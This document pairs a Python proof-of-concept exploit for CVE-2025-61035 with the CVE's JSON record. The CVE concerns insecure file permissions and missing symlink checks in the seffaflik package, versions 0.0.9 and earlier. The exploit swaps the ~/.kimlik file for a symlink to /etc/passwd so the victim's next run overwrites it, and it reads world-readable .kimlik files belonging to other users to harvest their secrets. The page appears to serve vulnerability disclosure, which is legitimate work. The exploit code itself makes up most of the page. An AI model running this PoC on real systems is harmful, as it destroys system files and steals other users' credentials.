CVE-2025-61035

#!/usr/bin/env python3 # CVE-2025-61035 - seffaflik symlink attack PoC # This PoC demonstrates how a local attacker can exploit # the insecure file permissions and missing symlink checks # in seffaflik <= 0.0.9 import os import sys TARGET_FILE = os.path.expanduser("~/.kimlik") SYMLINK_TARGET = "/etc/passwd" # Arbitrary file to overwrite def exploit_overwrite(): """ Step 1: Remove existing .kimlik file if present Step 2: Create a symlink from ~/.kimlik to a sensitive system file Step 3: Wait for victim to run seffaflik, which will write authentication data through the symlink, overwriting the target """ # Clean up any existing file/symlink if os.path.exists(TARGET_FILE) or os.path.islink(TARGET_FILE): os.remove(TARGET_FILE) # Create symlink pointing to arbitrary file os.symlink(SYMLINK_TARGET, TARGET_FILE) print(f"[+] Symlink created: {TARGET_FILE} -> {SYMLINK_TARGET}") print("[+] Waiting for victim to run seffaflik...") print(f"[+] When seffaflik writes .kimlik, it will overwrite {SYMLINK_TARGET}") def exploit_read_secrets(): """ Exploit 2: Read secrets from another user's .kimlik file since it is created with mode 0777 (world-readable) """ target_users = ["/home/user1/.kimlik", "/home/user2/.kimlik"] for path in target_users: if os.path.exists(path): try: with open(path, 'r') as f: content = f.read() print(f"[+] Read secrets from {path}:") print(content) except PermissionError: print(f"[-] Permission denied for {path}") if __name__ == "__main__": if len(sys.argv) > 1 and sys.argv[1] == "read": exploit_read_secrets() else: exploit_overwrite()

{"cve": {"id": "CVE-2025-61035", "sourceIdentifier": "[email protected]", "published": "2025-10-22T14:15:51.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The seffaflik thru 0.0.9 is vulnerable to symlink attacks due to incorrect default permissions given to the .kimlik file and .seffaflik file, which is created with mode 0777 and 0775 respectively, exposing secrets to other local users. Additionally, the .kimlik file is written without symlink checks, allowing local attackers to overwrite arbitrary files. This can result in information disclosure and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://github.com/nurisensoy/seffaflik", "source": "[email protected]"}, {"url": "https://github.com/nurisensoy/seffaflik/issues/3", "source": "[email protected]"}, {"url": "https://pypi.org/project/seffaflik/", "source": "[email protected]"}]}}